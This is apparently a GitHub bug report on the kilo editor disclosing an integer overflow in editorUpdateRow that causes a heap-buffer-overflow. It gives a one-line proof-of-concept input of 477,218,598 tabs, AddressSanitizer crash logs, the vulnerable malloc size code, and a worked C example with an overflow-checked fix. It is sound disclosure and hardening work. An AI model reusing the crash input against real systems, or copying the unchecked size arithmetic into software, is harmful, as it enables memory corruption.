Integer Overflow && heap-buffer-overflow in kilo.c #60

Closed
Kirin-say opened this issue Aug 27, 2019 · 2 comments
Comments

@Kirin-say

There is a heap overflow caused by integer overflow in kilo.c.
POC:

python -c "print '\t'*477218598" > ./exp

In command line:

make CC="clang-4.0 -fsanitize=address"
./kilo  ./exp

Output:

=================================================================
==18601==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x608000000077 at pc 0x00000050f641 bp 0x7ffd0126fe50 sp 0x7ffd0126fe48
WRITE of size 1 at 0x608000000077 thread T0
    #0 0x50f640  (/home/kirin/kilo/kilo+0x50f640)
    #1 0x50fde0  (/home/kirin/kilo/kilo+0x50fde0)
    #2 0x511ae0  (/home/kirin/kilo/kilo+0x511ae0)
    #3 0x514833  (/home/kirin/kilo/kilo+0x514833)
    #4 0x7f99a53a0b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #5 0x41c339  (/home/kirin/kilo/kilo+0x41c339)

0x608000000077 is located 0 bytes to the right of 87-byte region [0x608000000020,0x608000000077)
allocated by thread T0 here:
    #0 0x4d1990  (/home/kirin/kilo/kilo+0x4d1990)
    #1 0x50f45e  (/home/kirin/kilo/kilo+0x50f45e)
    #2 0x50fde0  (/home/kirin/kilo/kilo+0x50fde0)
    #3 0x511ae0  (/home/kirin/kilo/kilo+0x511ae0)
    #4 0x514833  (/home/kirin/kilo/kilo+0x514833)
    #5 0x7f99a53a0b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/kirin/kilo/kilo+0x50f640) 
Shadow bytes around the buggy address:
  0x0c107fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c107fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00[07]fa
  0x0c107fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==18601==ABORTING

Analysis:
There is an integer overflow in function editorUpdateRow:

    for (j = 0; j < row->size; j++)
        if (row->chars[j] == TAB) tabs++;

    row->render = malloc(row->size + tabs*8 + nonprint*9 + 1);
    idx = 0;
    for (j = 0; j < row->size; j++) {
        if (row->chars[j] == TAB) {
            row->render[idx++] = ' ';
......

The size passed to malloc is calculated from the number of TABs in one row.
When the number of TABs is too big, it leads to an integer overflow, which finally leads to a heap-buffer-overflow.
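Worked example, added here and not code from the issue or from kilo itself, that reproduces the arithmetic behind the "87-byte region" in the ASan report above and shows a checked replacement for the size computation. `vulnerable_alloc_size` models kilo's `row->size + tabs*8 + nonprint*9 + 1` expression, which is evaluated in `int` in the excerpt, with an explicit `uint32_t` wrap so the result is deterministic. `safe_alloc_size`, `render_row` and `render_equals` are this example's own names, not kilo's API or kilo's actual fix; the tab expansion to the next multiple of 8 and the zero `nonprint` count are assumptions, and the sample rows are constructed.

```c
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TAB 9

/* Model of the size expression in kilo's editorUpdateRow:
 *     row->size + tabs*8 + nonprint*9 + 1
 * All operands are int there, so a large tab count overflows signed int
 * (undefined behaviour in C). On the usual two's-complement toolchains the
 * value wraps mod 2^32; this function reproduces that wrap explicitly in
 * uint32_t so the demonstration does not depend on compiler behaviour. */
uint32_t vulnerable_alloc_size(int size, int tabs, int nonprint)
{
    return (uint32_t)size + (uint32_t)tabs * 8u + (uint32_t)nonprint * 9u + 1u;
}

/* Hardened version (assumption: this is an illustrative fix, not kilo's):
 * every step is checked for overflow in size_t and the result is also
 * capped at INT_MAX because the render buffer is indexed with an int.
 * Returns 0 when the size cannot be represented; a valid size is always
 * at least 1 because of the trailing NUL. */
size_t safe_alloc_size(size_t size, size_t tabs, size_t nonprint)
{
    size_t tab_bytes, np_bytes, total;

    if (tabs > SIZE_MAX / 8 || nonprint > SIZE_MAX / 9) return 0;
    tab_bytes = tabs * 8;
    np_bytes = nonprint * 9;
    if (size > SIZE_MAX - tab_bytes) return 0;
    total = size + tab_bytes;
    if (total > SIZE_MAX - np_bytes) return 0;
    total += np_bytes;
    if (total > SIZE_MAX - 1) return 0;
    total += 1;
    if (total > (size_t)INT_MAX) return 0;
    return total;
}

/* Render a row the way an editor would: each TAB expands to spaces up to
 * the next multiple of 8 (assumed rule; at most 8 bytes per tab, which is
 * what the tabs*8 term budgets for). nonprint is taken as 0 here.
 * Returns a malloc'd NUL-terminated string with its length in *rsize,
 * or NULL when the row is too long to size safely. */
char *render_row(const char *chars, int size, int *rsize)
{
    size_t tabs = 0, alloc, idx = 0;
    char *render;
    int j;

    for (j = 0; j < size; j++)
        if (chars[j] == TAB) tabs++;

    alloc = safe_alloc_size((size_t)size, tabs, 0);
    if (alloc == 0) return NULL;   /* the original would have wrapped here */

    render = malloc(alloc);
    if (render == NULL) return NULL;

    for (j = 0; j < size; j++) {
        if (chars[j] == TAB) {
            render[idx++] = ' ';
            while (idx % 8 != 0) render[idx++] = ' ';
        } else {
            render[idx++] = chars[j];
        }
    }
    render[idx] = '\0';
    *rsize = (int)idx;
    return render;
}

/* Render a constructed row and compare it with the expected text. */
bool render_equals(const char *chars, int size, const char *expected)
{
    int rsize;
    char *r = render_row(chars, size, &rsize);
    bool ok = r != NULL && (int)strlen(expected) == rsize && strcmp(r, expected) == 0;
    free(r);
    return ok;
}

int main(void)
{
    /* The issue's POC: one row consisting of 477218598 TAB characters. */
    int poc_tabs = 477218598;
    printf("wrapped malloc size: %u\n",
           vulnerable_alloc_size(poc_tabs, poc_tabs, 0));
    printf("checked malloc size: %zu (0 = refused)\n",
           safe_alloc_size((size_t)poc_tabs, (size_t)poc_tabs, 0));
    /* constructed sample row: 'a', TAB, 'b' */
    printf("render ok: %d\n", render_equals("a\tb", 3, "a       b"));
    return 0;
}
```

Compile with `cc -std=c99 -Wall example.c`. For the POC row (size 477218598, tabs 477218598) the wrapped expression comes out to 87, exactly the 87-byte region ASan reports, while the checked version refuses the row instead of handing a tiny buffer to a loop that writes up to 8 bytes per tab.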

@smile-e3

smile-e3 commented Sep 9, 2019

Why is my output:

==51677==ERROR: AddressSanitizer failed to allocate 0x1999c000 (429506560) bytes of LargeMmapAllocator (error code: 12)
==51677==Process memory map follows:
	0x000000400000-0x000000548000	/home/clb/binary/kilo/kilo
	0x000000747000-0x000000748000	/home/clb/binary/kilo/kilo
	0x000000748000-0x00000074c000	/home/clb/binary/kilo/kilo
	0x00000074c000-0x0000013b1000	
	0x00007fff7000-0x00008fff7000	
	0x00008fff7000-0x02008fff7000	
	0x02008fff7000-0x10007fff8000	
	0x600000000000-0x602000000000	
	0x602000000000-0x602000010000	
	0x602000010000-0x602e00000000	
	0x602e00000000-0x602e00010000	
	0x602e00010000-0x604000000000	
	0x604000000000-0x604000010000	
	0x604000010000-0x604e00000000	
	0x604e00000000-0x604e00010000	
	0x604e00010000-0x60c000000000	
	0x60c000000000-0x60c000010000	
	0x60c000010000-0x60ce00000000	
	0x60ce00000000-0x60ce00010000	
	0x60ce00010000-0x616000000000	
	0x616000000000-0x616000010000	
	0x616000010000-0x616e00000000	
	0x616e00000000-0x616e00010000	
	0x616e00010000-0x621000000000	
	0x621000000000-0x621000010000	
	0x621000010000-0x621e00000000	
	0x621e00000000-0x621e00010000	
	0x621e00010000-0x624000000000	
	0x624000000000-0x624000010000	
	0x624000010000-0x624e00000000	
	0x624e00000000-0x624e00010000	
	0x624e00010000-0x625000000000	
	0x625000000000-0x625000010000	
	0x625000010000-0x625e00000000	
	0x625e00000000-0x625e00010000	
	0x625e00010000-0x629000000000	
	0x629000000000-0x629000010000	
	0x629000010000-0x629e00000000	
	0x629e00000000-0x629e00010000	
	0x629e00010000-0x62d000000000	
	0x62d000000000-0x62d000010000	
	0x62d000010000-0x62de00000000	
	0x62de00000000-0x62de00010000	
	0x62de00010000-0x631000000000	
	0x631000000000-0x631000020000	
	0x631000020000-0x631e00000000	
	0x631e00000000-0x631e00010000	
	0x631e00010000-0x640000000000	
	0x640000000000-0x640000003000	
	0x7f33a4662000-0x7f33af400000	
	0x7f33af500000-0x7f33af600000	
	0x7f33af661000-0x7f33b1a36000	
	0x7f33b1a36000-0x7f33b1bf6000	/lib/x86_64-linux-gnu/libc-2.23.so
	0x7f33b1bf6000-0x7f33b1df6000	/lib/x86_64-linux-gnu/libc-2.23.so
	0x7f33b1df6000-0x7f33b1dfa000	/lib/x86_64-linux-gnu/libc-2.23.so
	0x7f33b1dfa000-0x7f33b1dfc000	/lib/x86_64-linux-gnu/libc-2.23.so
	0x7f33b1dfc000-0x7f33b1e00000	
	0x7f33b1e00000-0x7f33b1e16000	/lib/x86_64-linux-gnu/libgcc_s.so.1
	0x7f33b1e16000-0x7f33b2015000	/lib/x86_64-linux-gnu/libgcc_s.so.1
	0x7f33b2015000-0x7f33b2016000	/lib/x86_64-linux-gnu/libgcc_s.so.1
	0x7f33b2016000-0x7f33b2019000	/lib/x86_64-linux-gnu/libdl-2.23.so
	0x7f33b2019000-0x7f33b2218000	/lib/x86_64-linux-gnu/libdl-2.23.so
	0x7f33b2218000-0x7f33b2219000	/lib/x86_64-linux-gnu/libdl-2.23.so
	0x7f33b2219000-0x7f33b221a000	/lib/x86_64-linux-gnu/libdl-2.23.so
	0x7f33b221a000-0x7f33b2322000	/lib/x86_64-linux-gnu/libm-2.23.so
	0x7f33b2322000-0x7f33b2521000	/lib/x86_64-linux-gnu/libm-2.23.so
	0x7f33b2521000-0x7f33b2522000	/lib/x86_64-linux-gnu/libm-2.23.so
	0x7f33b2522000-0x7f33b2523000	/lib/x86_64-linux-gnu/libm-2.23.so
	0x7f33b2523000-0x7f33b252a000	/lib/x86_64-linux-gnu/librt-2.23.so
	0x7f33b252a000-0x7f33b2729000	/lib/x86_64-linux-gnu/librt-2.23.so
	0x7f33b2729000-0x7f33b272a000	/lib/x86_64-linux-gnu/librt-2.23.so
	0x7f33b272a000-0x7f33b272b000	/lib/x86_64-linux-gnu/librt-2.23.so
	0x7f33b272b000-0x7f33b2743000	/lib/x86_64-linux-gnu/libpthread-2.23.so
	0x7f33b2743000-0x7f33b2942000	/lib/x86_64-linux-gnu/libpthread-2.23.so
	0x7f33b2942000-0x7f33b2943000	/lib/x86_64-linux-gnu/libpthread-2.23.so
	0x7f33b2943000-0x7f33b2944000	/lib/x86_64-linux-gnu/libpthread-2.23.so
	0x7f33b2944000-0x7f33b2948000	
	0x7f33b2948000-0x7f33b296e000	/lib/x86_64-linux-gnu/ld-2.23.so
	0x7f33b2990000-0x7f33b2b5d000	
	0x7f33b2b5d000-0x7f33b2b6d000	
	0x7f33b2b6d000-0x7f33b2b6e000	/lib/x86_64-linux-gnu/ld-2.23.so
	0x7f33b2b6e000-0x7f33b2b6f000	/lib/x86_64-linux-gnu/ld-2.23.so
	0x7f33b2b6f000-0x7f33b2b70000	
	0x7ffe0835b000-0x7ffe0837d000	[stack]
	0x7ffe083a9000-0x7ffe083ac000	[vvar]
	0x7ffe083ac000-0x7ffe083ae000	[vdso]
	0xffffffffff600000-0xffffffffff601000	[vsyscall]
==51677==End of process memory map.
==51677==AddressSanitizer CHECK failed: /build/llvm-toolchain-4.0-euGZ6h/llvm-toolchain-4.0-4.0/projects/compiler-rt/lib/sanitizer_common/sanitizer_common.cc:120 "((0 && "unable to mmap")) != (0)" (0x0, 0x0)
    #0 0x4dc0df  (/home/clb/binary/kilo/kilo+0x4dc0df)
    #1 0x4f7055  (/home/clb/binary/kilo/kilo+0x4f7055)
    #2 0x4e6571  (/home/clb/binary/kilo/kilo+0x4e6571)
    #3 0x4f01c6  (/home/clb/binary/kilo/kilo+0x4f01c6)
    #4 0x423c14  (/home/clb/binary/kilo/kilo+0x423c14)
    #5 0x4d1f24  (/home/clb/binary/kilo/kilo+0x4d1f24)
    #6 0x50f16e  (/home/clb/binary/kilo/kilo+0x50f16e)
    #7 0x50faf0  (/home/clb/binary/kilo/kilo+0x50faf0)
    #8 0x5117f0  (/home/clb/binary/kilo/kilo+0x5117f0)
    #9 0x514543  (/home/clb/binary/kilo/kilo+0x514543)
    #10 0x7f33b1a5682f  (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #11 0x4198c8  (/home/clb/binary/kilo/kilo+0x4198c8)


I've become a fool!!

@antirez (Owner)

antirez commented Jul 2, 2020

Fixed, thanks!
